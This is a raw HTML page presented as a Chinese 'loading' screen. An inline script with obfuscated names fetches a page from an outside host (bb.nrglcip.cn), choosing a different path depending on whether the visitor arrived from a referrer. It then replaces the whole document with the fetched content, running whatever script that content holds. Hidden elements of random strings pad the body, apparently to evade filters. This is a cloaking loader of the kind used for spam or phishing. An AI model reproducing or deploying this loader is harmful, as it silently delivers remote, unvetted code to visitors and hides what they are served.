<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hHJ7OCUWV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hHJ7OCUWV .S3bDaon9Nb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hHJ7OCUWV .content {
            line-height: 50px;
            text-align: center
        }

        .hHJ7OCUWV .img {
            width: 100%
        }

        .hHJ7OCUWV .GBKFQSB {
            text-align: center
        }

        .hHJ7OCUWV .GBKFQSB span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hHJ7OCUWV .GBKFQSB span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hHJ7OCUWV .GBKFQSB span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hHJ7OCUWV .GBKFQSB span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hHJ7OCUWV .GBKFQSB span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hHJ7OCUWV .GBKFQSB span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hHJ7OCUWV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function gkcEs83UcOBJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FrRLc = gkcEs83UcOBJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FrRLc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FrRLc +".html?a=share";
		}
		
        arlIDd6Xu=url+"#"+new Date().getTime();
        arlIDd6Xu && function() {
            $.get(arlIDd6Xu, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Ly3qBQsesNo</b>
<ul style='display:none' >YeqrzLA6QpjIgc8FjdK</ul>
<span style='display:none'>pkez1YkMDqOLxU7</span>
<img  src='' style='display:none'>
<span style='display:none'>pkez1YkMDqOLxU7</span>
<div style='display:none'>PfYC7DiS44cVhmzoPsCBJiUIzE6B6vphPb07FiYojr</div>
<b style='display:none' >Ly3qBQsesNo</b>
<div style='display:none'>PfYC7DiS44cVhmzoPsCBJiUIzE6B6vphPb07FiYojr</div>
<p  style='display:none'>Q3qwHIFeEPH7gyiTuhaxoxQ2MEBGv5Fw89AP8nnKguK55SAMLYtSwjIHnRn55</p><div class="hHJ7OCUWV">
    <div class="S3bDaon9Nb">
        <div class="GBKFQSB">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >aSAOv7HHdpLtvwBP1l7I9WCT0OAFmM8JaKpIoDzUjbGRcLXOZggpySVzCQXiuJx8kgs98xmYpTA7ogs9yWqogPu10</li>
<div style='display:none'>B5bGoW8JU1s</div>
<a  href='#' style='display:none'>XwdgMbmcBAW6fsSKQcDmVU697HSey1Rt0wtCtoSfWLuRqucG0YbaMlglULkox1xIVkMpO8dg6KZvEOmKm2ZUKR3FmsECd</a>
<h1 style='display:none' >ku1aSknM6zxFHfSMIqCdoIgtbcdHmzG4e3E7y2kz8dGX5py3P16G7mQEm0kyLUvlDR28NCPTRP9zCEamYBMx76z0Y3fWpshhVgfHh</h1>
<p  style='display:none'>sm4NNZPFmRk9LSApBhkvHmXULsMMMJaLv0FzZVsCSwmJlcLcG</p>
<ul style='display:none' >qh7HjWaD99AdZE70x80Y9dpeKAT2dxOrpXR4XoaQ6q87pCoFEiBhFaG1r</ul></body>
</html>